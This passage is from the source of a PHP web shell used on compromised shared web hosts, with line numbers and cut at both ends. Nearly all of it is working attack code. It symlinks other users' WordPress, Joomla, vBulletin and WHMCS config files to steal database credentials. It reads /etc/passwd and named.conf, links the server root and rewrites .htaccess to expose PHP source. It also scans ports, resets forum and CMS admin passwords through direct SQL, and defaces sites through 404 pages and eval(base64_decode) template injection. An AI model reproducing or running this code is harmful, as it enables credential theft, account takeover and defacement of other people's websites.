  1002. <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
  1003. <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
  1004. <?php if($os != 'Windows')
  1005. {
  1006. echo "<td align=center><font size=2>";
  1007. echo getOGid($val)."</font></td>";
  1009. } ?>
  1010. <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
  1011. <td></td><td></td><td></td></tr><?php continue;
  1012. }
  1013. else if(is_dir($vv))
  1014. {
  1015. ?>
  1016. <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
  1017. <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
  1018. <td class='info'><font size=2>DIR</font></td>
  1020. <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
  1021. <?php if($os != 'Windows')
  1022. {
  1023. echo "<td align=center><font size=2>";
  1024. echo getOGid($val)."</font></td>";
  1025. } ?>
  1026. <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
  1027. <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
  1028. <td></td>
  1029. <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
  1030. </tr></font>
  1031. <?php
  1032. }
  1033. else if(is_file($vv))
  1034. {
  1035. ?>
  1036. <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
  1037. <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
  1039. <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
  1041. <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
  1043. <?php if($os != 'Windows')
  1044. {
  1045. echo "<td align=center><font size=2>";
  1046. echo getOGid($val)."</font></td>";
  1047. } ?>
  1048. <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
  1050. <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
  1051. <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
  1052. <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
  1053. </tr>
  1054. <p>
  1055. <?php
  1056. }
  1057. }
  1059. echo "</table>
  1060. <div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label> &nbsp;
  1061. <select class=sbox name=choice style='width: 100px;'>
  1062. <option value=delete>Delete</option>
  1063. <option value=chmod>Change mode</option>
  1064. if(class_exists('ZipArchive'))
  1065. { <option value=compre>Compress</option>
  1066. <option value=uncompre>Uncompress</option> }
  1067. </select>
  1069. <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
  1070. }}
  1071. else
  1072. {
  1073. echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
  1074. }
  1076. }
  1077. if(isset($_REQUEST["script"]))
  1078. {
  1079. $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
  1080. ?>
  1081. <center><table><tr><td><a href=javascript:void(0) onClick="getdata('manuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
  1082. <td><a href=javascript:void(0) onClick="getdata('scriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
  1083. </tr></table></center>
  1084. <?php
  1085. }
  1086. else if(isset($_REQUEST['manuallyscript']))
  1087. {
  1088. ?>
  1089. <center>
  1090. <form action="<?php echo $self; ?>" method="post">
  1091. <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
  1092. <input type="button" OnClick="manuallyscriptfn(passwd.value)" value="Get Config" class="but">
  1093. </form>
  1094. </center>
  1095. <?php
  1096. }
  1097. else if(isset($_REQUEST['scriptlocator']))
  1098. {
  1099. if(stristr(php_uname(),"Linux"))
  1100. {
  1101. $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  1102. $path=explode('/',$url);
  1103. $url =str_replace($path[count($path)-1],'',$url);
  1104. function syml($usern,$pdomain)
  1105. {
  1106. symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  1107. symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
  1108. symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  1109. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  1110. symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
  1111. symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
  1112. symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  1113. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  1114. symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
  1115. symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  1116. symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  1117. symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  1118. symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  1119. symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  1120. symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  1121. symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  1122. symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  1123. symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  1124. symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  1125. symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  1126. symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  1127. symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  1128. symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  1129. symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  1130. symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
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  1343. $matches = array();
  1344. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1345. $matches = str_replace("home/","",$matches[1]);
  1346. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1347. continue;
  1348. syml($matches,$matches);
  1349. }
  1350. fclose($file);
  1351. unlink("test.txt");
  1352. echo "<center><font class=txt size=3>[ Done ]</font></center>";
  1353. echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
  1355. }
  1356. else
  1357. {
  1358. $d0mains = @file("/etc/named.conf");
  1359. if($d0mains)
  1360. {
  1361. mkdir("dhanushST");
  1362. chdir("dhanushST");
  1364. foreach($d0mains as $d0main)
  1365. {
  1366. if(eregi("zone",$d0main))
  1367. {
  1368. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1369. flush();
  1371. if(strlen(trim($domains[1][0])) > 2)
  1372. {
  1373. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1375. syml($user['name'],$domains[1][0]);
  1376. }
  1377. }
  1378. }
  1379. echo "<center><font class=txt size=3>[ Done ]</font></center>";
  1380. echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
  1381. }
  1382. else
  1383. {
  1384. mkdir("dhanushSPT");
  1385. chdir("dhanushSPT");
  1386. $temp = "";
  1387. $val1 = 0;
  1388. $val2 = 1000;
  1389. for(;$val1 <= $val2;$val1++)
  1390. {
  1391. $uid = @posix_getpwuid($val1);
  1392. if ($uid)
  1393. $temp .= join(':',$uid)."\n";
  1394. }
  1395. echo '<br/>';
  1396. $temp = trim($temp);
  1398. $file5 = fopen("test.txt","w");
  1399. fputs($file5,$temp);
  1400. fclose($file5);
  1403. $file = fopen("test.txt", "r") or exit("Unable to open file!");
  1404. while(!feof($file))
  1405. {
  1406. $s = fgets($file);
  1407. $matches = array();
  1408. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1409. $matches = str_replace("home/","",$matches[1]);
  1410. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1411. continue;
  1412. syml($matches,$matches);
  1413. }
  1414. fclose($file);
  1415. echo "</table>";
  1416. unlink("test.txt");
  1417. echo "<center><font class=txt size=3>[ Done ]</font></center>";
  1418. echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
  1419. }
  1420. }
  1421. }
  1422. else
  1423. echo "<center>Cannot Complete the task!!!!</center>";
  1425. }
  1426. else if(isset($_GET["symlinkfile"]))
  1427. {
  1428. if(!isset($_GET['file']))
  1429. {
  1430. ?>
  1431. <center>
  1432. <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
  1433. <input type="text" class="box" name="file" size="50" value="/etc/passwd">
  1434. <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
  1435. </form></center>
  1436. <br><br>
  1437. <?php
  1438. }
  1439. }
  1441. else if(isset($_GET['symlinkmyfile']))
  1442. {
  1443. if(stristr(php_uname(),"Linux"))
  1444. {
  1445. $fakedir="cx";
  1446. $fakedep=16;
  1448. $num=0; // offset of symlink.$num
  1450. if(!empty($_GET['myfile']))
  1451. $file=$_GET['myfile'];
  1452. else $file="";
  1454. if(empty($file))
  1455. exit;
  1457. if(!is_writable("."))
  1458. echo "not writable directory";
  1460. $level=0;
  1462. for($as=0;$as<$fakedep;$as++)
  1463. {
  1464. if(!file_exists($fakedir))
  1465. mkdir($fakedir);
  1466. chdir($fakedir);
  1467. }
  1469. while(1<$as--) chdir("..");
  1471. $hardstyle = explode("/", $file);
  1473. for($a=0;$a<count($hardstyle);$a++)
  1474. {
  1475. if(!empty($hardstyle[$a]))
  1476. {
  1477. if(!file_exists($hardstyle[$a]))
  1478. mkdir($hardstyle[$a]);
  1479. chdir($hardstyle[$a]);
  1480. $as++;
  1481. }
  1482. }
  1483. $as++;
  1484. while($as--)
  1485. chdir("..");
  1487. @rmdir("fakesymlink");
  1488. @unlink("fakesymlink");
  1490. @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
  1492. while(1)
  1493. if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
  1494. else $num++;
  1496. @unlink("fakesymlink");
  1497. mkdir("fakesymlink");
  1499. echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
  1500. }
  1501. else
  1502. echo '<CENTER>Cannot Create Symlink</CENTER>';
  1503. }
  1504. else if(isset($_REQUEST['404new']))
  1505. {
  1506. ?>
  1507. <form>
  1508. <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
  1509. <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
  1510. </br>
  1511. </form>
  1512. <?php
  1513. }
  1514. else if(isset($_REQUEST['404page']))
  1515. {
  1516. $url = $_SERVER['REQUEST_URI'];
  1517. $path=explode('/',$url);
  1518. $url =str_replace($path[count($path)-1],'',$url);
  1519. if(isset($_POST['message']))
  1520. {
  1521. if($myfile = fopen(".htaccess", "a"))
  1522. {
  1523. fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
  1524. if($myfilee = fopen("404.html", "w+"))
  1525. {
  1526. fwrite($myfilee, $_POST['message']);
  1527. }
  1528. echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
  1529. }
  1530. else
  1531. echo "<center>Cannot Set 404 Page</center>";
  1532. }
  1533. else if(strlen($ind) != 0)
  1534. {
  1535. if($myfile = fopen(".htaccess", "a"))
  1536. {
  1537. fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
  1539. if($myfilee = fopen("404.html", "w+"))
  1540. {
  1541. fwrite($myfilee, base64_decode($ind));
  1543. fclose($myfilee);
  1544. echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
  1545. }
  1546. fclose($myfile);
  1547. }
  1548. else
  1549. {
  1550. echo "<center>Cannot Set 404 Page</center>";
  1551. }
  1552. }
  1553. else
  1554. echo "<center>Nothing Specified in the shell</center>";
  1555. }
  1556. else if(isset($_GET["domains"]))
  1557. {
  1558. ?><center><iframe src="<?php echo '' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center><?php
  1559. }
  1560. else if(isset($_GET["symlink"]))
  1561. {
  1562. $d0mains = @file("/etc/named.conf");
  1563. $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  1564. $path=explode('/',$url);
  1565. $url =str_replace($path[count($path)-1],'',$url);
  1566. if($d0mains)
  1567. {
  1568. @mkdir("dhanush",0777);
  1569. @chdir("dhanush");
  1570. execmd("ln -s / root");
  1571. $file3 = 'Options all
  1572. DirectoryIndex Sux.html
  1573. AddType text/plain .php
  1574. AddHandler server-parsed .php
  1575. AddType text/plain .html
  1576. AddHandler txt .html
  1577. Require None
  1578. Satisfy Any
  1579. ';
  1580. $fp3 = fopen('.htaccess','w');
  1581. $fw3 = fwrite($fp3,$file3);
  1582. @fclose($fp3);
  1583. echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
  1585. $dcount = 1;
  1586. foreach($d0mains as $d0main)
  1587. {
  1588. if(eregi("zone",$d0main))
  1589. {
  1590. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1591. flush();
  1593. if(strlen(trim($domains[1][0])) > 2)
  1594. {
  1595. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1597. echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
  1598. $dcount++;
  1599. }
  1600. }
  1602. }
  1603. echo "</table>";
  1604. }
  1605. else
  1606. {
  1607. if(stristr(php_uname(),"Linux"))
  1608. {
  1609. ?>
  1610. <div style="float:left;position:fixed;">
  1611. <form>
  1612. <table cellpadding="9">
  1613. <tr>
  1614. <th colspan="2">Get User Name</th>
  1615. </tr>
  1616. <tr>
  1617. <td>Enter Website Name :</td>
  1618. <td><input type="text" name="sitename" value="" class="sbox"></td>
  1619. </tr>
  1620. <tr>
  1621. <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
  1622. </tr>
  1623. <tr>
  1624. <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
  1625. </tr>
  1626. </table>
  1627. </form>
  1628. </div>
  1629. <?php
  1630. $TEST=@file('/etc/passwd');
  1631. if ($TEST)
  1632. {
  1633. @mkdir("dhanush",0777);
  1634. @chdir("dhanush");
  1635. execmd("ln -s / root");
  1636. $file3 = 'Options all
  1637. DirectoryIndex Sux.html
  1638. AddType text/plain .php
  1639. AddHandler server-parsed .php
  1640. AddType text/plain .html
  1641. AddHandler txt .html
  1642. Require None
  1643. Satisfy Any
  1644. ';
  1645. $fp3 = fopen('.htaccess','w');
  1646. $fw3 = fwrite($fp3,$file3);
  1647. @fclose($fp3);
  1649. echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
  1651. $dcount = 1;
  1652. $file = fopen("/etc/passwd", "r");
  1653. //Output a line of the file until the end is reached
  1654. while(!feof($file))
  1655. {
  1656. $s = fgets($file);
  1657. $matches = array();
  1658. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1659. $matches = str_replace("home/","",$matches[1]);
  1660. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1661. continue;
  1662. echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
  1663. echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1664. $dcount++;
  1665. }
  1666. fclose($file);
  1668. echo "</table>";
  1669. }
  1670. else
  1671. {
  1672. @mkdir("dhanush",0777);
  1673. @chdir("dhanush");
  1674. execmd("ln -s / root");
  1675. $file3 = 'Options all
  1676. DirectoryIndex Sux.html
  1677. AddType text/plain .php
  1678. AddHandler server-parsed .php
  1679. AddType text/plain .html
  1680. AddHandler txt .html
  1681. Require None
  1682. Satisfy Any
  1683. ';
  1684. $fp3 = fopen('.htaccess','w');
  1685. $fw3 = fwrite($fp3,$file3);
  1686. @fclose($fp3);
  1688. echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
  1690. $temp = "";
  1691. $val1 = 0;
  1692. $val2 = 1000;
  1693. for(;$val1 <= $val2;$val1++)
  1694. {
  1695. $uid = @posix_getpwuid($val1);
  1696. if ($uid)
  1697. $temp .= join(':',$uid)."\n";
  1698. }
  1699. echo '<br/>';
  1700. $temp = trim($temp);
  1702. $file5 = fopen("test.txt","w");
  1703. fputs($file5,$temp);
  1704. fclose($file5);
  1706. $dcount = 1;
  1707. $file = fopen("test.txt", "r");
  1708. while(!feof($file))
  1709. {
  1710. $s = fgets($file);
  1711. $matches = array();
  1712. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1713. $matches = str_replace("home/","",$matches[1]);
  1714. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1715. continue;
  1716. echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
  1717. echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1718. $dcount++;
  1719. }
  1720. fclose($file);
  1721. echo "</table>";
  1722. unlink("test.txt");
  1723. }
  1724. }
  1725. else
  1726. echo "<center><font size=4 >Cannot create Symlink</font></center>";
  1727. }
  1728. }
  1729. else if(isset($_GET['host']) && isset($_GET['protocol']))
  1730. {
  1731. echo "Open Ports: ";
  1732. $host = $_GET['host'];
  1733. $proto = $_GET['protocol'];
  1734. $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  1735. for($current = 0; $current <= 23; $current++)
  1736. {
  1737. $currents = $myports[$current];
  1738. $service = getservbyport($currents, $proto);
  1739. // Try to connect to port
  1740. $result = fsockopen($host, $currents, $errno, $errstr, 1);
  1741. // Show results
  1742. if($result)
  1743. echo "<font class=txt>$currents, </font>";
  1744. }
  1745. }
  1746. else if(isset($_REQUEST['forumpass']))
  1747. {
  1748. $localhost = $_GET['f1'];
  1749. $database = $_GET['f2'];
  1750. $username = $_GET['f3'];
  1751. $password = $_GET['f4'];
  1752. $prefix = $_GET['prefix'];
  1753. $newpass = $_GET['newpass'];
  1754. $uid = $_GET['uid'];
  1756. if($_GET['forums'] == "vb")
  1757. {
  1758. $newpass = $_GET['newipbpass'];
  1759. $uid = $_GET['ipbuid'];
  1760. $con = mysql_connect($localhost,$username,$password);
  1761. $db = mysql_select_db($database,$con);
  1762. $salt = "eghjghrtd";
  1763. $newpassword = md5(md5($newpass) . $salt);
  1764. if($prefix == "" || $prefix == null)
  1765. $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
  1766. else
  1767. $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
  1768. if($sql)
  1769. {
  1770. mysql_close($con);
  1771. echo "<font class=txt>Password Changed Successfully</font>";
  1772. }
  1773. else
  1774. echo "Cannot Change Password";
  1775. }
  1776. else if($_GET['forums'] == "mybb")
  1777. {
  1778. $newpass = $_GET['newipbpass'];
  1779. $uid = $_GET['ipbuid'];
  1780. $con = mysql_connect($localhost,$username,$password);
  1781. $db = mysql_select_db($database,$con);
  1782. $salt = "jeghj";
  1783. $newpassword = md5(md5($salt).md5($newpass));
  1784. if($prefix == "" || $prefix == null)
  1785. $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
  1786. else
  1787. $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
  1788. if($sql)
  1789. {
  1790. mysql_close($con);
  1791. echo "<font class=txt>Password Changed Successfully</font>";
  1792. }
  1793. else
  1794. echo "Cannot Change Password";
  1795. }
  1796. else if($_GET['forums'] == "smf")
  1797. {
  1798. $newpass = $_GET['newipbpass'];
  1799. $uid = $_GET['ipbuid'];
  1800. $con = mysql_connect($localhost,$username,$password);
  1801. $db = mysql_select_db($database,$con);
  1803. if($prefix == "" || $prefix == null)
  1804. {
  1805. $result = mysql_query("select member_name from smf_members where id_member = $uid");
  1806. $row = mysql_fetch_array($result);
  1807. $membername = $row['member_name'];
  1808. $newpassword = sha1(strtolower($membername).$newpass);
  1809. $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
  1810. }
  1811. else
  1813. {
  1814. $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
  1815. $row = mysql_fetch_array($result);
  1816. $membername = $row['member_name'];
  1817. $newpassword = sha1(strtolower($membername).$newpass);
  1818. $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
  1819. }
  1820. if($sql)
  1821. {
  1822. mysql_close($con);
  1823. echo "<font class=txt>Password Changed Successfully</font>";
  1824. }
  1825. else
  1826. echo "Cannot Change Password";
  1827. }
  1828. else if($_GET['forums'] == "phpbb")
  1829. {
  1830. $newpass = $_POST['newipbpass'];
  1831. $uid = $_POST['ipbuid'];
  1832. $con = mysql_connect($localhost,$username,$password);
  1833. $db = mysql_select_db($database,$con);
  1835. $newpassword = md5($newpass);
  1836. if(empty($prefix) || $prefix == null)
  1837. $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
  1838. else
  1839. $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
  1840. if($sql)
  1841. {
  1842. mysql_close($con);
  1843. echo "<font class=txt>Password Changed Successfully</font>";
  1844. }
  1845. else
  1846. echo "Cannot Change Password";
  1847. }
  1848. else if($_GET['forums'] == "ipb")
  1849. {
  1850. $newpass = $_POST['newipbpass'];
  1851. $uid = $_POST['ipbuid'];
  1852. $con = mysql_connect($localhost,$username,$password);
  1853. $db = mysql_select_db($database,$con);
  1854. $salt = "eghj";
  1855. $newpassword = md5(md5($salt).md5($newpass));
  1856. if($prefix == "" || $prefix == null)
  1857. $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
  1858. else
  1859. $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
  1860. if($sql)
  1861. {
  1862. mysql_close($con);
  1863. echo "<font class=txt>Password Changed Successfully</font>";
  1864. }
  1865. else
  1866. echo "Cannot Change Password";
  1867. }
  1868. else if($_GET['forums'] == "wp")
  1869. {
  1870. $uname = $_GET['uname'];
  1871. $con = mysql_connect($localhost,$username,$password);
  1872. $db = mysql_select_db($database,$con);
  1874. $newpassword = md5($newpass);
  1875. if($prefix == "" || $prefix == null)
  1876. $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
  1877. else
  1878. $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
  1879. if($sql)
  1880. {
  1881. mysql_close($con);
  1882. echo "<font class=txt>Password Changed Successfully</font>";
  1883. }
  1884. else
  1885. echo "Cannot Change Password";
  1886. }
  1887. else if($_GET['forums'] == "joomla")
  1888. {
  1889. $newjoomlapass = $_GET['newjoomlapass'];
  1890. $joomlauname = $_GET['username'];
  1891. $con = mysql_connect($localhost,$username,$password);
  1892. $db = mysql_select_db($database,$con);
  1894. $newpassword = md5($newjoomlapass);
  1895. if($prefix == "" || $prefix == null)
  1896. $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'");
  1897. else
  1898. $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'");
  1899. if($sql)
  1900. {
  1901. mysql_close($con);
  1902. echo "<font class=txt>Password Changed Successfully</font>";
  1903. }
  1904. else
  1905. echo "Cannot Change Password";
  1906. }
  1907. }
  1908. else if(isset($_POST['forumdeface']))
  1909. {
  1910. $localhost = $_POST['f1'];
  1911. $database = $_POST['f2'];
  1912. $username = $_POST['f3'];
  1913. $password = $_POST['f4'];
  1914. $index = $_POST['index'];
  1915. $prefix = $_POST['tableprefix'];
  1917. if($_POST['forumdeface'] == "vb")
  1918. {
  1919. $con =@ mysql_connect($localhost,$username,$password);
  1920. $db =@ mysql_select_db($database,$con);
  1921. $index=str_replace('"','\\"',$index);
  1922. $attack = "{\${eval(base64_decode(\'";
  1923. $attack .= base64_encode("echo \"$index\";");
  1924. $attack .= "\'))}}{\${exit()}}</textarea>";
  1925. if($prefix == "" || $prefix == null)
  1926. $query = "UPDATE template SET template = '$attack'";
  1927. else
  1928. $query = "UPDATE ".$prefix."template SET template = '$attack'";
  1929. $result =@ mysql_query($query,$con);
  1930. if($result)
  1931. echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
  1932. else
  1933. echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
  1934. }
  1935. else if($_POST['forumdeface'] == "mybb")
  1936. {
  1937. $con =@ mysql_connect($localhost,$username,$password);
  1938. $db =@ mysql_select_db($database,$con);
  1939. $attack = "{\${eval(base64_decode(\'";
  1940. $attack .= base64_encode("echo \"$index\";");
  1941. $attack .= "\'))}}{\${exit()}}</textarea>";
  1942. $attack = str_replace('"',"\\'",$attack);
  1944. if($prefix == "" || $prefix == null)
  1945. $query = "UPDATE mybb_templates SET template = '$attack'";
  1946. else
  1947. $query = "UPDATE ".$prefix."templates SET template = '$attack'";
  1948. $result =@ mysql_query($query,$con);
  1949. if($result)
  1950. echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
  1951. else
  1952. echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
  1953. }
  1954. else if($_POST['forumdeface'] == "smf")
